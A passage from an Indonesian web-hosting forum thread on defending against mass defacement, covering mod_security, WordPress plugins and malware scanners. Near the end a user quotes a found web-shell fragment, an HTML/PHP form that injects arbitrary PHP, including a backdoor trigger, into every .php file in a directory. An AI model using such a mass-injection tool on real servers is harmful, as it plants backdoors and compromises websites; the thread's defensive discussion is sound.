Cara Penanganan Tepat Untuk Masalah Serangan Mass Deface


Status
Not open for further replies.
nda harus satu2 mas klo shellnya sama , 1 aja cukup buat penetration testing

Cuma saya masih bingung cara memasukkan phpshell bersangkutan ke mod_sec agar tidak berjalan kembali.

O Iya mas, boleh minta Patch untuk STT2 di Mod_sec gak?
Kalau boleh di share dunk

kalo yg kena yg paling banyak adalah wordpress nya, selain server yg di optimasi, CMS wordpress dan plugin itu sendiri juga harus di control :

Server udah di isi segala macem : csf, LMD, ClamAV, dsb msh bisa tembus


coba beberapa tips dari saya di blog ini :

http://blog.atriumhosting.com/wordpress-security-emergency-action/

krn wordpress masuk dari third party plugin......


Setelah pasang itu coba install plugin Exploit Scanner, krn percuma di optimasi kalo sang hacker ninggalin backdoor nya :)



Saya pelajari dulu Tuan
Makasih udah mau share :)
 
Mass Code Injection:<br><br>
Use this to add PHP to the end of every .php page in the directory specified.<br><br>
<form action="<?php echo $surl; ?>" method=GET>
<input type=hidden name="masssploit" value="php">
<input type=hidden name="x" value="massbrowsersploit">
<table border=0>
<tr><td>Dir to inject: </td><td><input type=text size=50 name="pathtomass" value="<?php echo realpath('.'); ?>"></td></tr>
<tr><td>Code to inject: </td><td><textarea name="injectthis" cols=50 rows=4><?php echo htmlspecialchars('<?php if ($_GET["x"] == "lul") { /*code*/; } ?>'); ?></textarea></td></tr>
<tr><td><input type=submit value="Inject Code"></td></tr>
</table>
</form>

Saya menemukan Source yang sangat berbahaya, sepertinya ini untuk infect file php.
 
Status
Not open for further replies.
Back
Top